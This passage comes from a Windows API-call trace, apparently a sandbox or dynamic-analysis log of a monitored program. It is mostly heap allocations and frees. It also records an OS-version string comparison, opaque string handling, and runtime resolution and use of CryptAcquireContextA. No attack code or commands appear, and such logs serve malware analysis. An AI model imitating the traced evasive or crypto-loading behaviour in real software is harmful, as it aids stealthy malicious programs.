hHeap=0x25c0000) returned 1 [0262.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0262.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0262.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.498] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.498] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0262.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.498] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0262.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0262.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.499] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0262.499] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0262.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0262.499] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0262.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0262.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0262.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.507] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0262.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0262.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.509] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0262.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0262.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0262.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.510] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0262.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0262.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.511] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0262.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.513] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0262.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.514] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.514] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0262.514] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.514] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0262.515] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.515] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.515] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.515] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.515] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.515] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.515] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0262.515] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.516] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: 